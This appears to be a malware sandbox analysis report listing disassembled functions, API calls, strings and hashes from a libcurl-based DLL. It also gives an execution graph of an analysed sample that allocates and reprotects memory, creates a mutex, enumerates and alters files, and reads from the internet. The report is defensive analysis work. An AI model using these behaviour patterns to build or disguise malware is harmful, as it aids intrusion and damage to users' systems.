                                                                                                                            • Opcode Fuzzy Hash: 0e59e53d5547cee780dba3cd453089248bd53cac4d8b1b6bf5563cfab45b20f6
                                                                                                                            • Instruction Fuzzy Hash: 63F0C037500154BFCF221F95CD09A8E3F76EF493A1F084561FE2995221DB36D960DBA0
                                                                                                                            Function 6B6E83D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6C14E0: EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,6B6D1C62,?,00000000), ref: 6B6C15E0
                                                                                                                              • Part of subcall function 6B6C14E0: LeaveCriticalSection.KERNEL32(?,?,?,6B6D1C62,?,00000000), ref: 6B6C15F3
                                                                                                                              • Part of subcall function 6B6C14E0: closesocket.WS2_32(000006FC), ref: 6B6C1642
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000100,Connection #%ld to host %s left intact,?,?), ref: 6B6E8690
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeaveclosesocketcurl_msnprintf
                                                                                                                            • String ID: %s$Connection #%ld to host %s left intact
                                                                                                                            • API String ID: 283241466-118628944
                                                                                                                            • Opcode ID: 78a19c4e8a4486e3ed6caf266d4d4b124ae1438ff579d9f307f3038f5c2f40a2
                                                                                                                            • Instruction ID: 6c4145733356e1eb89cd6ccec62f6ac6893e58a81052919a19c7f6e40e30ac69
                                                                                                                            • Opcode Fuzzy Hash: 78a19c4e8a4486e3ed6caf266d4d4b124ae1438ff579d9f307f3038f5c2f40a2
                                                                                                                            • Instruction Fuzzy Hash: 22A116F0605B01AFD721CF34CC45BDAB7A4BF05309F0001A9E869562A1DB79A656CFB5
                                                                                                                            Function 6B6CAE10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CAE35
                                                                                                                            Strings
                                                                                                                            • Can't get the size of %s, xrefs: 6B6CAF14
                                                                                                                            • Can't open %s for writing, xrefs: 6B6CAE9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: Can't get the size of %s$Can't open %s for writing
                                                                                                                            • API String ID: 601868998-3544860555
                                                                                                                            • Opcode ID: f87bde237729b2706f5c81bd76d1b0069a49f0c9fff56d744e090df69f421e58
                                                                                                                            • Instruction ID: 69b91b9017d03bc078022b9f65c384101cd8179e874167f93ec4a21b0b4461a2
                                                                                                                            • Opcode Fuzzy Hash: f87bde237729b2706f5c81bd76d1b0069a49f0c9fff56d744e090df69f421e58
                                                                                                                            • Instruction Fuzzy Hash: 5B81B2F1F002089BDB14DFB8DD81AEEB7F5EF88304F14417AE91A97200EB7969558B52
                                                                                                                            Function 6B6C6020 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,00000000), ref: 6B6C615B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_strnequal
                                                                                                                            • String ID: Set-Cookie:$none
                                                                                                                            • API String ID: 482932555-3629594122
                                                                                                                            • Opcode ID: 97126a36848ffee822a02ccd78b004c995358694d279cc1838a2ff60cd337b75
                                                                                                                            • Instruction ID: 7815894970f8d6a45d1b01348f483cc506bdb2f79d794b3bfcc1c3f09c56cc7b
                                                                                                                            • Opcode Fuzzy Hash: 97126a36848ffee822a02ccd78b004c995358694d279cc1838a2ff60cd337b75
                                                                                                                            • Instruction Fuzzy Hash: 785108F1A083856AEB014A385D467BB3FA5DF12249F0800F5ED55AB243EB6AC545C2AB
                                                                                                                            Function 6B6D8840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6D87E0: curl_msnprintf.LIBCURL(?,00000007,:%u,?,00000000,?,?,?,6B6D7CB2,?,?,?,00000106,?,00000000), ref: 6B6D8830
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000007,:%u,?,0000002A,?,?,?,?,?,00000000,00000000), ref: 6B6D88CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintf
                                                                                                                            • String ID: :%u$Hostname in DNS cache was stale, zapped
                                                                                                                            • API String ID: 1809024409-2924501231
                                                                                                                            • Opcode ID: 9cc23f4a3e3c2cdc0b4d8feefad321df504e43a13763ffa8555770b8a485b1bf
                                                                                                                            • Instruction ID: 554eaca144e87772c956d541756a4b81f7e53b661c20c88d9321454ad56736ee
                                                                                                                            • Opcode Fuzzy Hash: 9cc23f4a3e3c2cdc0b4d8feefad321df504e43a13763ffa8555770b8a485b1bf
                                                                                                                            • Instruction Fuzzy Hash: FD4147B1A00209AFCF15DF38CC45BEAB778EF05304F0052E9E99957211DB39AA55CFA1
                                                                                                                            Function 6B6D4080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6FE5D0: QueryPerformanceCounter.KERNEL32(6B6EF03B,?,6B6C669E,6B6EF03B,?,?,?,?), ref: 6B6FE5E5
                                                                                                                              • Part of subcall function 6B6FE5D0: __alldvrm.LIBCMT ref: 6B6FE5FE
                                                                                                                              • Part of subcall function 6B6FE5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6FE627
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6D40E3
                                                                                                                            Strings
                                                                                                                            • Too old connection (%ld seconds), disconnect it, xrefs: 6B6D40FF
                                                                                                                            • Connection %ld seems to be dead!, xrefs: 6B6D415B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery__alldvrm
                                                                                                                            • String ID: Connection %ld seems to be dead!$Too old connection (%ld seconds), disconnect it
                                                                                                                            • API String ID: 3283211967-2324667105
                                                                                                                            • Opcode ID: fd2258ae2f43356b9b79d8b6490606914269165f374383a617943b4f14b536b4
                                                                                                                            • Instruction ID: 4cd36ed210fb7a371aa42bfc87081d96b8acae18c1790b393b70dd354bfbf160
                                                                                                                            • Opcode Fuzzy Hash: fd2258ae2f43356b9b79d8b6490606914269165f374383a617943b4f14b536b4
                                                                                                                            • Instruction Fuzzy Hash: 943139B1E04205ABE7105F388C43BF6B769EB55328F5002A4F82C672C2E7B969A583D5
                                                                                                                            Function 6B6EDB40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_slist_append.LIBCURL(00000000,Content-Type: application/dns-message,0000013C,00000000,00000440,?,00000000,00000000,?,6B6D8617,00000000,00000000,?,00000000), ref: 6B6EDB87
                                                                                                                            • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?), ref: 6B6EDC0D
                                                                                                                            Strings
                                                                                                                            • Content-Type: application/dns-message, xrefs: 6B6EDB74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_appendcurl_slist_free_all
                                                                                                                            • String ID: Content-Type: application/dns-message
                                                                                                                            • API String ID: 2220803400-4173715026
                                                                                                                            • Opcode ID: f3822b394d4e1a50029ab220be55157be010b6bd24f4ff86c99671e1f5885ceb
                                                                                                                            • Instruction ID: 5596a46ba9fbd2f6600c03d417bf308fc137734a47f9cca09214730c021990e9
                                                                                                                            • Opcode Fuzzy Hash: f3822b394d4e1a50029ab220be55157be010b6bd24f4ff86c99671e1f5885ceb
                                                                                                                            • Instruction Fuzzy Hash: 4D21E5F2944B04ABE7118E70EC41BE7B7EDFF44348F004829EA1D93291E376A511CBA0
                                                                                                                            Function 6B6CC540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_easy_strerror.LIBCURL(00000000), ref: 6B6CC579
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_easy_strerror
                                                                                                                            • String ID: Failure sending QUIT command: %s$QUIT
                                                                                                                            • API String ID: 1399792982-1162443993
                                                                                                                            • Opcode ID: 9188798f5bb0a616443183278e19d67f279a0ad68efcc32fa594c58a71471519
                                                                                                                            • Instruction ID: b4f90ce492b30b778564e51ca5e10682d2d825f63c4d00cf3b4661d0a25c2fe4
                                                                                                                            • Opcode Fuzzy Hash: 9188798f5bb0a616443183278e19d67f279a0ad68efcc32fa594c58a71471519
                                                                                                                            • Instruction Fuzzy Hash: 4621E0B0909740EBE7109B70C90AB87BBE8EF05309F440069F45E96251DBBDA164CBE6
                                                                                                                            Function 6B6FAB80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6FABA5
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6FABD5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: 8Tlk
                                                                                                                            • API String ID: 601868998-1816532293
                                                                                                                            • Opcode ID: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
                                                                                                                            • Instruction ID: febb0f59eb96f335deb13959db58bd3ce70e28c5883cc6a8578de9d39909911b
                                                                                                                            • Opcode Fuzzy Hash: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
                                                                                                                            • Instruction Fuzzy Hash: E41188B55082555FEB018E24AC807B6BBBFAF062D9F1444D6DCD49B203D329D957CBA0
                                                                                                                            Function 6B6CCA30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strstr
                                                                                                                            • String ID: ;type=
                                                                                                                            • API String ID: 2882301372-3507045495
                                                                                                                            • Opcode ID: b64c4854e4de28a1433d0cbfed83d5ed7da3d69682219e6d29b52edc21e56f69
                                                                                                                            • Instruction ID: f171693af8faa99fac330b1ca7b15390c277acdce34c6885d4599bfaa743698f
                                                                                                                            • Opcode Fuzzy Hash: b64c4854e4de28a1433d0cbfed83d5ed7da3d69682219e6d29b52edc21e56f69
                                                                                                                            • Instruction Fuzzy Hash: 7011E6F15443459ED710DF68D8487C2BFE4EB05368F08027AE85E8F281D77AA55587E2
                                                                                                                            Function 6B6C33D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • getsockopt.WS2_32(00004020,0000FFFF,00001001,00000000,00000004), ref: 6B6C343B
                                                                                                                            • setsockopt.WS2_32(00004020,0000FFFF,00001001,00004020,00000004), ref: 6B6C3460
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: getsockoptsetsockopt
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 194641219-2726393805
                                                                                                                            • Opcode ID: e3bc06be760f3c887caa528c37f2875e8f7a4479f0e656ee4ddac5dea0d927c2
                                                                                                                            • Instruction ID: 91f21098da90497277ff3b5576d3a6ad3095374fc5b60719853277f58c3818ec
                                                                                                                            • Opcode Fuzzy Hash: e3bc06be760f3c887caa528c37f2875e8f7a4479f0e656ee4ddac5dea0d927c2
                                                                                                                            • Instruction Fuzzy Hash: B501B5B1944209FBEF21DF94DC46BAE77B8EB01705F0081A1FA14EA2C0DBBAD6549B41
                                                                                                                            Function 6B6DD8C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(Digest,6B6DB74C,00000006,00000DD0,?,?,6B6DB74C), ref: 6B6DD8E6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_strnequal
                                                                                                                            • String ID: Digest$t!
                                                                                                                            • API String ID: 482932555-3305821177
                                                                                                                            • Opcode ID: 91430005cd4cff66667082c7893c7055cd72c23b4460a806b69fe0b836426cf4
                                                                                                                            • Instruction ID: 5d2d683f165b673e8b6092787925fc5824dcae5207388d34e62dc1964cc9ee50
                                                                                                                            • Opcode Fuzzy Hash: 91430005cd4cff66667082c7893c7055cd72c23b4460a806b69fe0b836426cf4
                                                                                                                            • Instruction Fuzzy Hash: E7F0FCD3E4425412DB005D697C01B9777DD4F42158F0800B2FD9CDB242E62AE5158AF1
                                                                                                                            Function 6B71FE5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 6B71FE82
                                                                                                                              • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
                                                                                                                              • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                                            • String ID: 8hlk$8hlk
                                                                                                                            • API String ID: 1353095263-184109835
                                                                                                                            • Opcode ID: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
                                                                                                                            • Instruction ID: 817f8c4bc8f6697079c2808c04e4538ae84298697a88e5cfdec7e03868cd5e56
                                                                                                                            • Opcode Fuzzy Hash: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
                                                                                                                            • Instruction Fuzzy Hash: 26F06D371443059F8710CE68DA00A86B7E4EF99621310892AF89ED7211D330E412CBA0
                                                                                                                            Function 6B6F04D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29sleepnetworkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00002726,?,6B6E744F,?,?,?,?,00000000,?), ref: 6B6F04EE
                                                                                                                            • Sleep.KERNEL32(FFFFFFFE), ref: 6B6F0511
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                            • String ID: Otnk
                                                                                                                            • API String ID: 1458359878-2429921538
                                                                                                                            • Opcode ID: c8413a98bb0a9d6275c1ad748afb031a3cb3143410feee8ec2467330b1d0fb17
                                                                                                                            • Instruction ID: 49bbf2a865871e345904740672ae0e5d6e166038f080a0a6ad2a6a531947211e
                                                                                                                            • Opcode Fuzzy Hash: c8413a98bb0a9d6275c1ad748afb031a3cb3143410feee8ec2467330b1d0fb17
                                                                                                                            • Instruction Fuzzy Hash: C8E065B161460946EB184E694D04619335FAB85234F10D719BC39C62D4E7B9D4024540

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:20.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:4.9%
                                                                                                                            Total number of Nodes:103
                                                                                                                            Total number of Limit Nodes:5
                                                                                                                            execution_graph 668 7064826 670 70647ea 668->670 669 70649ef 3 API calls 671 70649cc 669->671 670->668 670->669 672 7064a0a 3 API calls 671->672 673 70649ea 672->673 674 7064002 GetShortPathNameA 675 706400e 674->675 676 706418e 677 70641a5 676->677 678 706419a SetFileAttributesA 676->678 678->677 679 70640ce HttpQueryInfoW 680 7064d2f 681 7064d41 lstrcpy PathRemoveBackslashA 680->681 682 7064d3a 680->682 683 70642cc wsprintfA 684 7064cec 685 7064cfb 684->685 686 7064d19 684->686 685->686 687 7064cff lstrcpy PathRemoveBackslashA 685->687 688 70640ed 689 7064116 688->689 691 7064125 689->691 692 706413f 689->692 693 7064153 InternetReadFile 692->693 694 7064167 693->694 695 706416d 693->695 694->693 694->695 695->691 696 7064faa lstrcmpW 697 7064fb5 696->697 604 7064bb7 605 7064bc2 604->605 606 7064c11 CreateFileW 604->606 605->606 607 7064bcb StrRStrIW 605->607 607->606 608 7064bdf StrRStrIW 607->608 609 7064c07 608->609 610 7064bf3 StrRStrIW 608->610 610->606 610->609 698 7064cb5 699 7064cc0 StrCmpNIA 698->699 700 7064cd6 698->700 699->700 701 7064012 702 7064026 701->702 703 706402a GetShortPathNameW 702->703 704 706403b 702->704 703->704 711 70647f1 712 70647ea 711->712 713 70649ef 3 API calls 712->713 714 70649cc 713->714 715 7064a0a 3 API calls 714->715 716 70649ea 715->716 611 706485e 612 70648ae 611->612 617 70649ef 612->617 618 70649f7 617->618 619 7064a0a 3 API calls 618->619 620 70649cc 618->620 619->618 621 7064a0a 620->621 622 70649ea 621->622 625 7064a25 621->625 623 7064a4a VirtualAlloc 623->622 624 7064a77 623->624 624->622 626 7064ac5 VirtualProtect VirtualProtect 624->626 625->622 625->623 626->622 717 7064c7e 718 7064c89 StrCmpNIW 717->718 719 7064c9f 717->719 718->719 720 70642dc 721 70642ed 720->721 722 7064303 721->722 724 706430e 721->724 725 7064322 SHFileOperation 724->725 725->722 627 7064b3d 628 7064b97 CreateFileA 627->628 629 7064b48 627->629 629->628 630 7064b51 StrRStrIA 629->630 630->628 631 7064b65 StrRStrIA 630->631 632 7064b8d 631->632 633 7064b79 StrRStrIA 631->633 633->628 633->632 634 7064d7d StrRStrIA 635 7064dc4 CreateMutexA 634->635 636 7064d8a lstrlen 634->636 637 7064dd5 635->637 638 7064d9a 636->638 638->635 641 7064da8 638->641 644 7064db5 wsprintfA 641->644 645 7064dc4 CreateMutexA 644->645 646 7064db0 645->646 647 7064e18 lstrcmp 648 7064e23 647->648 655 7064365 SetErrorMode 648->655 650 7064e3e 651 7064ea5 lstrlen 650->651 652 7064ed2 651->652 656 7064eec wsprintfA 652->656 654 7064ee7 655->650 656->654 657 70641d8 lstrcat FindFirstFileA 661 70641f6 657->661 658 706424a FindNextFileA 659 706425b FindClose 658->659 658->661 661->658 662 7064221 lstrcat 661->662 663 7064210 lstrcmp 661->663 662->661 664 706424a FindNextFileA 663->664 665 70641f6 663->665 664->665 666 706425b FindClose 664->666 665->664 667 7064221 lstrcat 665->667 666->661 667->665

                                                                                                                            Callgraph

                                                                                                                            Executed Functions

                                                                                                                            Function 070641D8 Relevance: 7.6, APIs: 5, Instructions: 51filestringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • lstrcat.KERNEL32(?,070641D4), ref: 070641D9
                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 070641ED
                                                                                                                              • Part of subcall function 070641FD: lstrcmp.KERNEL32(?,070641FB), ref: 070641FE
                                                                                                                              • Part of subcall function 070641FD: lstrcat.KERNEL32(?,?), ref: 0706422C
                                                                                                                              • Part of subcall function 070641FD: FindNextFileA.KERNELBASE(?,?), ref: 07064251
